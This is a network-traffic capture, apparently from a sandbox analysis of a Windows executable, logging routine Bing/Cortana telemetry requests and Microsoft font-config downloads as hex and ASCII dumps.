                                    2023-01-25 18:45:01 UTC138OUTData Raw: 7b 31 41 43 31 34 45 37 37 2d 30 32 45 37 2d 34 45 35 44 2d 42 37 34 34 2d 32 45 42 31 41 45 35 31 39 38 42 37 7d 5c 5c 63 6f 6d 65 78 70 2e 6d 73 63 22 2c 22 44 4e 61 6d 65 22 3a 22 43 6f 6d 70 6f 6e 65 6e 74 20 53 65 72 76 69 63 65 73 22 2c 22 41 70 70 4c 6e 63 68 22 3a 30 2c 22 41 72 67 73 22 3a 30 2c 22 4d 44 4e 22 3a 30 2c 22 45 78 74 22 3a 22 2e 6d 73 63 22 7d 2c 22 52 61 6e 6b 65 72 53 69 67 6e 61 6c 73 22 3a 7b 22 72 61 6e 6b 69 6e 67 53 63 6f 72 65 22 3a 31 2e 33 37 33 38 38 2c 22 66 65 61 74 75 72 65 53 74 6f 72 65 22 3a 7b 22 31 22 3a 31 2c 22 37 22 3a 39 35 36 39 2c 22 38 22 3a 31 2c 22 31 30 22 3a 35 2c 22 31 33 22 3a 32 2c 22 31 36 22 3a 39 35 36 39 2c 22 31 39 22 3a 31 2c 22 34 32 22 3a 31 2c 22 38 33 22 3a 31 2c 22 31 33 34 22 3a 31 33 2c
                                    Data Ascii: {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\comexp.msc","DName":"Component Services","AppLnch":0,"Args":0,"MDN":0,"Ext":".msc"},"RankerSignals":{"rankingScore":1.37388,"featureStore":{"1":1,"7":9569,"8":1,"10":5,"13":2,"16":9569,"19":1,"42":1,"83":1,"134":13,
                                    2023-01-25 18:45:01 UTC154OUTData Raw: 52 54 55 41 4c 5f 55 52 4c 3f 71 72 79 3d 69 26 73 65 74 6c 61 6e 67 3d 65 6e 2d 55 53 26 63 63 3d 55 53 26 6e 6f 68 73 3d 31 26 63 70 3d 31 26 63 76 69 64 3d 31 34 65 66 38 30 39 34 36 39 37 35 34 63 33 66 39 37 30 65 65 34 38 30 33 36 35 37 61 38 65 32 26 69 67 3d 37 39 39 38 35 37 30 30 63 62 38 63 34 31 32 36 38 38 34 66 32 39 36 63 36 34 38 36 30 64 30 63 26 41 53 49 6e 69 74 49 47 3d 43 30 34 30 39 45 38 34 43 37 45 43 34 44 31 36 41 32 43 44 44 41 34 38 30 35 45 32 44 33 43 34 22 2c 22 52 65 73 6f 75 72 63 65 73 56 65 72 73 69 6f 6e 22 3a 22 38 5f 30 31 5f 30 5f 30 30 30 30 30 30 22 7d 2c 22 54 53 22 3a 31 36 30 31 34 37 37 35 36 38 31 39 32 2c 22 55 54 53 22 3a 31 36 37 34 37 30 34 37 30 31 31 38 32 2c 22 55 78 43 6c 61 73 73 69 66 69 63 61 74 69
                                    Data Ascii: RTUAL_URL?qry=i&setlang=en-US&cc=US&nohs=1&cp=1&cvid=14ef809469754c3f970ee4803657a8e2&ig=79985700cb8c4126884f296c64860d0c&ASInitIG=C0409E84C7EC4D16A2CDDA4805E2D3C4","ResourcesVersion":"8_01_0_000000"},"TS":1601477568192,"UTS":1674704701182,"UxClassificati
                                    2023-01-25 18:45:01 UTC170OUTData Raw: 22 3a 22 77 69 6e 64 6f 77 73 22 7d 2c 22 43 6f 6f 6b 69 65 73 22 3a 7b 22 4d 55 49 44 22 3a 22 31 45 31 37 42 39 42 37 30 45 39 42 34 43 36 45 39 35 37 44 31 35 39 45 44 33 36 34 36 46 46 46 22 2c 22 5f 53 53 22 3a 7b 22 43 50 49 44 22 3a 22 31 36 37 34 37 30 34 36 39 31 30 38 37 22 2c 22 41 43 22 3a 22 31 22 2c 22 43 50 48 22 3a 22 34 65 66 36 36 31 66 32 22 7d 7d 7d 5d 5d 3e 3c 2f 44 3e 3c 50 61 67 65 3e 3c 4e 61 6d 65 3e 50 61 67 65 2e 53 6d 61 72 74 53 65 61 72 63 68 2e 41 53 2e 53 75 67 67 65 73 74 69 6f 6e 73 3c 2f 4e 61 6d 65 3e 3c 4c 3e 3c 21 5b 43 44 41 54 41 5b 5b 7b 22 54 22 3a 22 4c 2e 42 6f 78 22 2c 22 41 70 70 4e 53 22 3a 22 53 6d 61 72 74 53 65 61 72 63 68 22 2c 22 52 65 67 69 6f 6e 22 3a 22 43 6f 72 65 22 2c 22 4c 22 3a 5b 7b 22 54 22 3a
                                    Data Ascii: ":"windows"},"Cookies":{"MUID":"1E17B9B70E9B4C6E957D159ED3646FFF","_SS":{"CPID":"1674704691087","AC":"1","CPH":"4ef661f2"}}}...</D><Page><Name>Page.SmartSearch.AS.Suggestions</Name><L><![CDATA[[{"T":"L.Box","AppNS":"SmartSearch","Region":"Core","L":[{"T":
                                    2023-01-25 18:45:01 UTC178INHTTP/1.1 204 No Content
                                    Access-Control-Allow-Origin: *
                                    X-Cache: CONFIG_NOCACHE
                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                    X-MSEdge-Ref: Ref A: A2BF79EF3E4A4022BC6B8A6F2FE46EAB Ref B: FRA31EDGE0209 Ref C: 2023-01-25T18:45:01Z
                                    Date: Wed, 25 Jan 2023 18:45:01 GMT
                                    Connection: close


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    2192.168.2.349682204.79.197.200443C:\Users\user\Desktop\98j0BL6iLT.exe
                                    TimestampkBytes transferredDirectionData
                                    2023-01-25 18:45:07 UTC179OUTPOST /threshold/xls.aspx HTTP/1.1
                                    Origin: https://www.bing.com
                                    Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                    Content-type: text/xml
                                    X-MSEdge-ExternalExpType: JointCoord
                                    X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40
                                    X-PositionerType: Desktop
                                    X-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguage
                                    X-Search-SafeSearch: Moderate
                                    X-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}
                                    X-UserAgeClass: Unknown
                                    X-BM-Market: US
                                    X-BM-DateFormat: M/d/yyyy
                                    X-CortanaAccessAboveLock: false
                                    X-Device-OSSKU: 48
                                    X-BM-DTZ: -420
                                    X-BM-FirstEnabledTime: 132061295966656129
                                    X-DeviceID: 0100748C09004E33
                                    X-BM-DeviceScale: 100
                                    X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard Time
                                    X-BM-Theme: 000000;0078d7
                                    X-BM-DeviceDimensionsLogical: 1232x1024
                                    X-BM-DeviceDimensions: 1232x1024
                                    X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAXwwSr16TwZxvghymg//XETj6Tm1HeWPPaa%2Bp3rbli/mvLOk/T6EkvQNUk399UzR3LIX4M/iQEWA7aQU%2BOfqpbEzl5FRxfViukt0nIOJC4GauVchsCLJf/OzsxoL8utB7g00/KCY%2BTs3oE5N9riluRal8eU6Lp1ZeKUF8E3dAd1WdY2OYkiMfIN6hKZymZE77pW/tUmE8J2cLrx40JkPjrOcc97Ka4s6MWsJQjAgG45Zgaw8ZAMII6%2Bh9%2BCunAdSjJkPBj6AG540X%2BB/1oCnPjGVdu/hkAggEmOTH%2BMrTonvu5uKb2W9CXRw6SSDX3iq2ZPiFJjju9%2BmNMHjpZf/rnwDZgAACPnVUJ8qmC%2B3qAHxPY%2BYLLGbXL3O%2BvyWnRNXbqpplR/SNfFS3pzS7lkShmCUmyiwax%2Bl4lLGzKvky6WQGfBUQsanWoOo38%2BGqTYOiSdJllW7r%2BTuLEeq6JUw33Lxr/TxnJ%2B58Zwuvn1wQ3WRGrQDwQyBIv//mDpGhB%2BEWVL2NAg0j0VsA2TI%2BaLgas6IJ64Xh%2BNzAw/K5ZBIt2wC5DtbafbNFDsyJu2IPWcuCXlodod0bXMQ4Vp%2BSeJxMnivHScTVa6g9gzPVuwrGWxLDLIyLX0PBk8Vtxf2iPg85vCv%2Ba6yIu9PMJpqJUzGVENLWVod%2B4tYQ2vWUJJaZDLN191JnF5s12cdic/XLMbHIjhyhX4QA0hkvf%2B2gret8Fsy/8VhtgtUQPskWn5Bk0vrmTVXVszRUs5230czaLlSQyKRH3GXkihUKMGnwj/U3vaTXVT/0xRBEwKjx95iiDkLVgrCdgH7PNRFII62usTlSZ6Bm9JbgyetkWyU2BsE4XvEr2NLqaCLUAhsj%2Bq32LZSv6VHIAmPz5JgFwgM4r7bzWT4ubL0GWqeXOX502lQL724mOtyICas1gE%3D%26p%3D
                                    X-Agent-DeviceId: 0100748C09004E33
                                    X-BM-CBT: 1660685844
                                    X-Device-isOptin: true
                                    X-Device-Touch: false
                                    X-Device-ClientSession: D8F6B43E3D444318ACE6FB571E033018
                                    X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                    X-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader
                                    Accept: */*
                                    Accept-Language: en-US
                                    Accept-Encoding: gzip, deflate, br
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
                                    Host: www.bing.com
                                    Content-Length: 85516
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Cookie: MUID=1E17B9B70E9B4C6E957D159ED3646FFF; _SS=CPID=1674704691087&AC=1&CPH=4ef661f2
                                    2023-01-25 18:45:07 UTC181OUTData Raw: 3c 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 31 34 44 35 41 36 39 41 42 45 46 46 36 39 36 32 30 31 34 35 41 44 30 35 42 46 43 37 36 38 35 38 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 38 38 63 37 66 36 62 34 61 64 66 33 34 33 64 32 62 63 61 66 64 34 65 33 30 64 63 65 61 38 36 34 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 43 46 22 3a 22 70 62 69 74 63 70 64 69 73 61 62 6c 65 64 2c 41 6d 62 69 65
                                    Data Ascii: <ClientInstRequest><CID>14D5A69ABEFF69620145AD05BFC76858</CID><Events><E><T>Event.ClientInst</T><IG>88c7f6b4adf343d2bcafd4e30dcea864</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","CF":"pbitcpdisabled,Ambie
                                    2023-01-25 18:45:07 UTC197OUTData Raw: 62 69 65 6e 74 57 69 64 65 73 63 72 65 65 6e 2c 72 73 31 6d 75 73 69 63 70 72 6f 64 2c 43 6f 72 74 61 6e 61 53 50 41 58 61 6d 6c 48 65 61 64 65 72 22 2c 22 55 54 53 22 3a 31 36 37 34 37 30 34 37 30 36 34 32 37 7d 5d 5d 3e 3c 2f 44 3e 3c 54 53 3e 31 36 33 32 33 35 39 33 31 38 31 37 36 3c 2f 54 53 3e 3c 2f 45 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 43 30 34 30 39 45 38 34 43 37 45 43 34 44 31 36 41 32 43 44 44 41 34 38 30 35 45 32 44 33 43 34 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f
                                    Data Ascii: bientWidescreen,rs1musicprod,CortanaSPAXamlHeader","UTS":1674704706427}...</D><TS>1632359318176</TS></E><E><T>Event.ClientInst</T><IG>C0409E84C7EC4D16A2CDDA4805E2D3C4</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivo
                                    2023-01-25 18:45:07 UTC213OUTData Raw: 36 39 38 30 2c 22 53 45 51 22 3a 31 34 2c 22 55 54 53 22 3a 31 36 37 34 37 30 34 37 30 36 34 32 37 7d 5d 5d 3e 3c 2f 44 3e 3c 54 53 3e 31 36 33 32 33 35 39 33 38 34 39 31 32 3c 2f 54 53 3e 3c 2f 45 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 63 61 66 30 64 61 36 61 65 34 61 61 34 64 33 32 38 65 61 34 32 63 37 39 62 34 38 39 38 31 65 31 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 43 46 22 3a 22 70 62 69 74 63 70 64 69 73 61 62 6c 65 64 2c 41 6d 62 69 65 6e 74 57
                                    Data Ascii: 6980,"SEQ":14,"UTS":1674704706427}...</D><TS>1632359384912</TS></E><E><T>Event.ClientInst</T><IG>caf0da6ae4aa4d328ea42c79b48981e1</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","CF":"pbitcpdisabled,AmbientW
                                    2023-01-25 18:45:07 UTC229OUTData Raw: 63 70 72 6f 64 2c 43 6f 72 74 61 6e 61 53 50 41 58 61 6d 6c 48 65 61 64 65 72 22 2c 22 45 6e 72 69 63 68 65 64 43 6c 69 65 6e 74 49 6e 66 6f 22 3a 7b 22 4d 55 49 44 22 3a 22 31 45 31 37 42 39 42 37 30 45 39 42 34 43 36 45 39 35 37 44 31 35 39 45 44 33 36 34 36 46 46 46 22 2c 22 41 43 56 65 72 22 3a 22 34 65 66 36 36 31 66 32 22 2c 22 46 44 50 61 72 74 6e 65 72 45 6e 74 72 79 22 3a 22 61 75 74 6f 73 75 67 67 65 73 74 22 2c 22 69 73 4f 66 66 6c 69 6e 65 22 3a 30 2c 22 77 65 62 52 65 71 75 65 73 74 65 64 22 3a 31 2c 22 65 6e 74 72 79 50 6f 69 6e 74 22 3a 22 57 4e 53 42 4f 58 22 2c 22 70 72 65 76 69 6f 75 73 45 78 70 65 72 69 65 6e 63 65 22 3a 22 50 72 6f 61 63 74 69 76 65 22 2c 22 64 65 76 69 63 65 48 69 73 74 6f 72 79 45 6e 61 62 6c 65 64 22 3a 31 2c 22 77
                                    Data Ascii: cprod,CortanaSPAXamlHeader","EnrichedClientInfo":{"MUID":"1E17B9B70E9B4C6E957D159ED3646FFF","ACVer":"4ef661f2","FDPartnerEntry":"autosuggest","isOffline":0,"webRequested":1,"entryPoint":"WNSBOX","previousExperience":"Proactive","deviceHistoryEnabled":1,"w
                                    2023-01-25 18:45:07 UTC245OUTData Raw: 6f 6e 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 51 46 5f 4b 45 59 53 54 52 4f 4b 45 5f 56 49 52 54 55 41 4c 5f 55 52 4c 3f 71 72 79 3d 75 26 73 65 74 6c 61 6e 67 3d 65 6e 2d 55 53 26 63 63 3d 55 53 26 6e 6f 68 73 3d 31 26 63 70 3d 31 26 63 76 69 64 3d 34 36 63 63 30 31 62 37 37 63 31 61 34 34 66 61 38 30 37 65 61 30 33 39 38 64 33 62 63 66 37 64 26 69 67 3d 64 32 32 33 62 62 37 63 39 34 33 65 34 34 65 32 39 35 39 38 31 37 38 38 34 36 39 39 66 31 36 34 26 41 53 49 6e 69 74 49 47 3d 43 30 34 30 39 45 38 34 43 37 45 43 34 44 31 36 41 32 43 44 44 41 34 38 30 35 45 32 44 33 43 34 22 2c 22 52 65 73 6f 75 72 63 65 73 56 65 72 73 69 6f 6e 22 3a 22 38 5f 30 31 5f 30 5f 30 30 30 30 30 30 22 7d 2c 22 54 53 22 3a 31 36 33 32 33
                                    Data Ascii: onUrl":"https://www.bing.com/QF_KEYSTROKE_VIRTUAL_URL?qry=u&setlang=en-US&cc=US&nohs=1&cp=1&cvid=46cc01b77c1a44fa807ea0398d3bcf7d&ig=d223bb7c943e44e2959817884699f164&ASInitIG=C0409E84C7EC4D16A2CDDA4805E2D3C4","ResourcesVersion":"8_01_0_000000"},"TS":16323
                                    2023-01-25 18:45:07 UTC261OUTData Raw: 67 65 73 74 69 6f 6e 73 3c 2f 4e 61 6d 65 3e 3c 4c 3e 3c 21 5b 43 44 41 54 41 5b 5b 7b 22 54 22 3a 22 4c 2e 42 6f 78 22 2c 22 41 70 70 4e 53 22 3a 22 53 6d 61 72 74 53 65 61 72 63 68 22 2c 22 52 65 67 69 6f 6e 22 3a 22 43 6f 72 65 22 2c 22 4c 22 3a 5b 7b 22 54 22 3a 22 4c 2e 42 6f 78 22 2c 22 52 65 67 69 6f 6e 22 3a 22 54 6f 70 48 69 74 22 2c 22 4c 22 3a 5b 7b 22 54 22 3a 22 4c 2e 55 72 6c 22 2c 22 4b 22 3a 22 31 30 30 31 2e 31 22 7d 5d 7d 2c 7b 22 54 22 3a 22 4c 2e 42 6f 78 22 2c 22 52 65 67 69 6f 6e 22 3a 22 47 72 6f 75 70 73 22 2c 22 4c 22 3a 5b 7b 22 54 22 3a 22 4c 2e 42 6f 78 22 2c 22 52 65 67 69 6f 6e 22 3a 22 53 65 61 72 63 68 53 75 67 67 65 73 74 69 6f 6e 73 22 2c 22 4c 22 3a 5b 7b 22 54 22 3a 22 4c 2e 55 72 6c 22 2c 22 4b 22 3a 22 31 31 34 2e 31
                                    Data Ascii: gestions</Name><L><![CDATA[[{"T":"L.Box","AppNS":"SmartSearch","Region":"Core","L":[{"T":"L.Box","Region":"TopHit","L":[{"T":"L.Url","K":"1001.1"}]},{"T":"L.Box","Region":"Groups","L":[{"T":"L.Box","Region":"SearchSuggestions","L":[{"T":"L.Url","K":"114.1
                                    2023-01-25 18:45:07 UTC265INHTTP/1.1 204 No Content
                                    Access-Control-Allow-Origin: *
                                    X-Cache: CONFIG_NOCACHE
                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                    X-MSEdge-Ref: Ref A: BA59004C61104A848DC175E3D2EE5A0D Ref B: FRA31EDGE0217 Ref C: 2023-01-25T18:45:07Z
                                    Date: Wed, 25 Jan 2023 18:45:06 GMT
                                    Connection: close


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    3192.168.2.34968323.35.236.109443C:\Users\user\Desktop\98j0BL6iLT.exe
                                    TimestampkBytes transferredDirectionData
                                    2023-01-25 18:45:10 UTC265OUTHEAD /fs/windows/config.json HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: */*
                                    Accept-Encoding: identity
                                    User-Agent: Microsoft BITS/7.8
                                    Host: fs.microsoft.com
                                    2023-01-25 18:45:10 UTC265INHTTP/1.1 200 OK
                                    Content-Type: application/octet-stream
                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                    ApiVersion: Distribute 1.1
                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                    x-azure-ref: 20230124T115938Z-f5kzt0nx4h0qp95p604fy089cs000000010000000000epmk
                                    Cache-Control: public, max-age=148434
                                    Date: Wed, 25 Jan 2023 18:45:10 GMT
                                    Connection: close
                                    X-CID: 2


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    4192.168.2.34968423.35.236.109443C:\Users\user\Desktop\98j0BL6iLT.exe
                                    TimestampkBytes transferredDirectionData
                                    2023-01-25 18:45:10 UTC266OUTGET /fs/windows/config.json HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept: */*
                                    Accept-Encoding: identity
                                    If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                    Range: bytes=0-2147483646
                                    User-Agent: Microsoft BITS/7.8
                                    Host: fs.microsoft.com
                                    2023-01-25 18:45:10 UTC266INHTTP/1.1 200 OK
                                    Content-Type: application/octet-stream
                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                    ApiVersion: Distribute 1.1
                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                    X-Azure-Ref: 0VeCoYgAAAABR/Z6+30B1RLQsXmQnL8CBTE9OMjFFREdFMDIxMQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                    Cache-Control: public, max-age=229202
                                    Date: Wed, 25 Jan 2023 18:45:10 GMT
                                    Content-Length: 55
                                    Connection: close
                                    X-CID: 2
                                    2023-01-25 18:45:10 UTC266INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                    Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    5192.168.2.349685204.79.197.200443C:\Users\user\Desktop\98j0BL6iLT.exe
                                    TimestampkBytes transferredDirectionData
                                    2023-01-25 18:45:12 UTC267OUTPOST /threshold/xls.aspx HTTP/1.1
                                    Origin: https://www.bing.com
                                    Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                    Content-type: text/xml
                                    X-MSEdge-ExternalExpType: JointCoord
                                    X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40
                                    X-PositionerType: Desktop
                                    X-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguage
                                    X-Search-SafeSearch: Moderate
                                    X-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}
                                    X-UserAgeClass: Unknown
                                    X-BM-Market: US
                                    X-BM-DateFormat: M/d/yyyy
                                    X-CortanaAccessAboveLock: false
                                    X-Device-OSSKU: 48
                                    X-BM-DTZ: -420
                                    X-BM-FirstEnabledTime: 132061295966656129
                                    X-DeviceID: 0100748C09004E33
                                    X-BM-DeviceScale: 100
                                    X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard Time
                                    X-BM-Theme: 000000;0078d7
                                    X-BM-DeviceDimensionsLogical: 1232x1024
                                    X-BM-DeviceDimensions: 1232x1024
                                    X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAXwwSr16TwZxvghymg//XETj6Tm1HeWPPaa%2Bp3rbli/mvLOk/T6EkvQNUk399UzR3LIX4M/iQEWA7aQU%2BOfqpbEzl5FRxfViukt0nIOJC4GauVchsCLJf/OzsxoL8utB7g00/KCY%2BTs3oE5N9riluRal8eU6Lp1ZeKUF8E3dAd1WdY2OYkiMfIN6hKZymZE77pW/tUmE8J2cLrx40JkPjrOcc97Ka4s6MWsJQjAgG45Zgaw8ZAMII6%2Bh9%2BCunAdSjJkPBj6AG540X%2BB/1oCnPjGVdu/hkAggEmOTH%2BMrTonvu5uKb2W9CXRw6SSDX3iq2ZPiFJjju9%2BmNMHjpZf/rnwDZgAACPnVUJ8qmC%2B3qAHxPY%2BYLLGbXL3O%2BvyWnRNXbqpplR/SNfFS3pzS7lkShmCUmyiwax%2Bl4lLGzKvky6WQGfBUQsanWoOo38%2BGqTYOiSdJllW7r%2BTuLEeq6JUw33Lxr/TxnJ%2B58Zwuvn1wQ3WRGrQDwQyBIv//mDpGhB%2BEWVL2NAg0j0VsA2TI%2BaLgas6IJ64Xh%2BNzAw/K5ZBIt2wC5DtbafbNFDsyJu2IPWcuCXlodod0bXMQ4Vp%2BSeJxMnivHScTVa6g9gzPVuwrGWxLDLIyLX0PBk8Vtxf2iPg85vCv%2Ba6yIu9PMJpqJUzGVENLWVod%2B4tYQ2vWUJJaZDLN191JnF5s12cdic/XLMbHIjhyhX4QA0hkvf%2B2gret8Fsy/8VhtgtUQPskWn5Bk0vrmTVXVszRUs5230czaLlSQyKRH3GXkihUKMGnwj/U3vaTXVT/0xRBEwKjx95iiDkLVgrCdgH7PNRFII62usTlSZ6Bm9JbgyetkWyU2BsE4XvEr2NLqaCLUAhsj%2Bq32LZSv6VHIAmPz5JgFwgM4r7bzWT4ubL0GWqeXOX502lQL724mOtyICas1gE%3D%26p%3D
                                    X-Agent-DeviceId: 0100748C09004E33
                                    X-BM-CBT: 1660685844
                                    X-Device-isOptin: true
                                    X-Device-Touch: false
                                    X-Device-ClientSession: D8F6B43E3D444318ACE6FB571E033018
                                    X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                    X-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader
                                    Accept: */*
                                    Accept-Language: en-US
                                    Accept-Encoding: gzip, deflate, br
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
                                    Host: www.bing.com
                                    Content-Length: 86221
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Cookie: MUID=1E17B9B70E9B4C6E957D159ED3646FFF; _SS=CPID=1674704691087&AC=1&CPH=4ef661f2
                                    2023-01-25 18:45:12 UTC269OUTData Raw: 3c 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 31 34 44 35 41 36 39 41 42 45 46 46 36 39 36 32 30 31 34 35 41 44 30 35 42 46 43 37 36 38 35 38 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 61 33 62 63 62 61 37 34 38 36 36 63 34 31 38 30 38 66 39 38 37 65 32 35 34 34 33 34 63 34 31 31 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 43 46 22 3a 22 70 62 69 74 63 70 64 69 73 61 62 6c 65 64 2c 41 6d 62 69 65
                                    Data Ascii: <ClientInstRequest><CID>14D5A69ABEFF69620145AD05BFC76858</CID><Events><E><T>Event.ClientInst</T><IG>a3bcba74866c41808f987e254434c411</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","CF":"pbitcpdisabled,Ambie
                                    2023-01-25 18:45:12 UTC285OUTData Raw: 32 39 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 43 46 22 3a 22 70 62 69 74 63 70 64 69 73 61 62 6c 65 64 2c 41 6d 62 69 65 6e 74 57 69 64 65 73 63 72 65 65 6e 2c 72 73 31 6d 75 73 69 63 70 72 6f 64 2c 43 6f 72 74 61 6e 61 53 50 41 58 61 6d 6c 48 65 61 64 65 72 22 2c 22 65 72 72 6f 72 54 79 70 65 22 3a 22 53 65 6e 64 54 69 6d 65 64 4f 75 74 22 2c 22 66 61 69 6c 43 6f 75 6e 74 22 3a 31 2c 22 54 53 22 3a 31 36 33 32 34 30 39 36 39 35 32 31 36 2c 22 52 54 53 22 3a 33 35 36 39 30 2c 22 53 45 51 22 3a 32 37 2c 22
                                    Data Ascii: 29</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","CF":"pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader","errorType":"SendTimedOut","failCount":1,"TS":1632409695216,"RTS":35690,"SEQ":27,"
